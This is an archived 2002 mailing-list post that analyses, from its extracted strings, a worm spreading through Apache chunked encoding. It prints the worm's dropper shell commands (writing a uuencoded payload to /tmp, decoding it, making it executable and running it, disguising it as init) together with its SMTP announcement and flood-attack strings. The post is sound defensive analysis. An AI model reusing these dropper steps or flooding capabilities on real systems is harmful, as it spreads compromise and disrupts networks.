BA-2002-01 String-Based Analysis of Apache Chunked Encoding Worm

From: Golden_Eternity [[email protected]]
Sent: Friday, June 28, 2002 2:15 PM
Subject: RE: Apache worm in the wild

Just based on the strings in the .a file, this is my best guess as to what its 
doing. I haven't tried running it, yet, so my observations are very limited. 
Hopefully someone will find this interesting.

Domias Mituzas has already given us an analysis of the web requests on his site 
(http://dammit.lt/apache-worm/) so I won't look at that.

There are a lot of shell commands used instead of function calls. Also, in one 
instance, the worm executes the same command twice in close proximity. This has 
been interpreted by some to suggest that the author was not very skilled. I'll 
reserve judgement on that (especially, since I'm not all that skilled at reverse
 engineering).

--- Begin Observations ---

Old copies of the worm are removed.
uuencoded worm is written to /tmp/.uua from stdin (until '__eof__'). 

	rm -rf /tmp/.a;
	cat > /tmp/.uua << __eof__;

/tmp/.uua is uudecoded as /tmp/.a 
Worm tries to kill any active copies of itself.
Worm sets .a executable.
Worm tries to kill any active copies of itself (again).
Worm launches .a then exits.

	/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;
	killall -9 .a;
	chmod +x /tmp/.a;
	killall -9 .a;
	/tmp/.a %s;
	exit;

The worm probably logs its attempts to /tmp/.log

Elsewhere in the worm, it appears to attempt to disguise itself(?) as init. I 
couldn't tell where this file was created. Usage appears to match what we've 
seen for the worm elsewhere, but that isn't conclusive. Further analysis is 
needed.

	mv /tmp/tmp /tmp/init;
	export PATH="/tmp";
	init %s

It also appears to announce itself via email. It probably uses 
'[email protected]' as the source for some of these strings.

	HELO %s
	MAIL FROM:<%s>
	RCPT TO:<%s>
	DATA
	QUIT
	Return-Path: <%c%c%c%c%c%c%[email protected]>
	From: %s
	Message-ID: <%x.%x.%[email protected]>
	Date: %s
	Subject: %s
	To: %s
	Mime-Version: 1.0
	Content-Type: text/html

There are some strings that indicate that it is also designed for DoS. Domas 
Mituzas reported that the worm attempts to listen on 2001/udp.

	Cannot packet local networks
	Udp flooding target
	Tcp flooding target
	Sending packets to target
	Dns flooding target

The worm is nice enough to give usage by the way:

	%s <base 1> [base 2] ...

wink ([email protected]) has pointed out that an IP address that appears to be 
hard coded into the worm (12.127.17.71) resolves to dns-rs1.bgtmo.ip.att.net.

--- End Observations ---

All credit to: Domas Mituzas ([email protected]) 
Honorable mention: strings, uudecode, and md5sum.

-G_E